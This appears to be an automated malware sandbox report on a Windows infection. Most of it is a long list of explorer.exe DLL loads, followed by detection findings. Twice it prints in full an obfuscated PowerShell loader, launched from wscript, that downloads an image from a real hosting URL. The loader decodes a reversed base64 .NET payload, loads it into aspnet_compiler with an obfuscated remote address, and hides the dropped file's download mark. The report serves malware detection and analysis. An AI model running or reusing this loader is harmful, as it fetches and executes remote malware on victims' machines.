            Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: aepic.dll
            Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
            Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\explorer.exeSection loaded: userenv.dll
            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
            Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
            Source: C:\Windows\explorer.exeSection loaded: wininet.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: wldp.dll
            Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
            Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
            Source: C:\Windows\explorer.exeSection loaded: netutils.dll
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: aepic.dll
            Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
            Source: C:\Windows\explorer.exeSection loaded: userenv.dll
            Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
            Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
            Source: C:\Windows\explorer.exeSection loaded: wininet.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\explorer.exeSection loaded: wldp.dll
            Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
            Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
            Source: C:\Windows\explorer.exeSection loaded: netutils.dll
            Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
            Source: Binary string: aspnet_compiler.pdb source: uahuajd, 0000000D.00000000.1710544109.00000000000F2000.00000002.00000001.01000000.00000007.sdmp, uahuajd.12.dr

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell.exe -Command "if ($null -ne $PSVersionTable -and $PSVersionTabl", "0", "false");
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A02198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,14_2_00A02198
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040134A pushfd ; retf 11_2_00401353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004012F2 pushfd ; retf 11_2_004012F3
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_3_05B59721 push eax; ret 14_3_05B5972D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_3_05B59740 pushad ; retf 14_3_05B59F51
            Source: C:\Windows\explorer.exeCode function: 16_2_009BA055 push es; iretd 16_2_009BA05D
            Source: C:\Windows\explorer.exeCode function: 16_2_009B1405 push esi; ret 16_2_009B1407
            Source: C:\Windows\explorer.exeCode function: 16_2_009B47A7 push esp; iretd 16_2_009B47A8
            Source: C:\Windows\explorer.exeCode function: 16_2_009B14D4 push esi; ret 16_2_009B14D6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_008094E6 push edx; ret 17_2_008094E7
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0080967E push ds; retf 17_2_00809680
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_008038A7 push esp; iretd 17_2_008038A8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_001687CE push es; ret 18_2_00168A18
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00168EEF push edi; ret 18_2_00168EF0
            Source: C:\Windows\explorer.exeCode function: 19_2_009E14D4 push esi; ret 19_2_009E14D6
            Source: C:\Windows\explorer.exeCode function: 19_2_009E1405 push esi; ret 19_2_009E1407
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_00863417 push esp; iretd 20_2_00863418
            Source: C:\Windows\explorer.exeCode function: 24_2_009E1405 push esi; ret 24_2_009E1407
            Source: C:\Windows\explorer.exeCode function: 24_2_009E45A7 push esp; iretd 24_2_009E45A8
            Source: C:\Windows\explorer.exeCode function: 24_2_009E14D4 push esi; ret 24_2_009E14D6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_001B3627 push esp; iretd 26_2_001B3628
            Source: C:\Windows\explorer.exeCode function: 27_2_009D4817 push esp; iretd 27_2_009D4818
            Source: C:\Windows\explorer.exeCode function: 27_2_009D1405 push esi; ret 27_2_009D1407
            Source: C:\Windows\explorer.exeCode function: 27_2_009D14D4 push esi; ret 27_2_009D14D6
            Source: C:\Windows\explorer.exeCode function: 27_2_009DAAD2 push ebp; iretd 27_2_009DAAD3
            Source: C:\Windows\explorer.exeCode function: 27_2_009DAC8D push esp; iretd 27_2_009DAC95
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uahuajdJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uahuajdJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\uahuajd:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00163862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,18_2_00163862
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
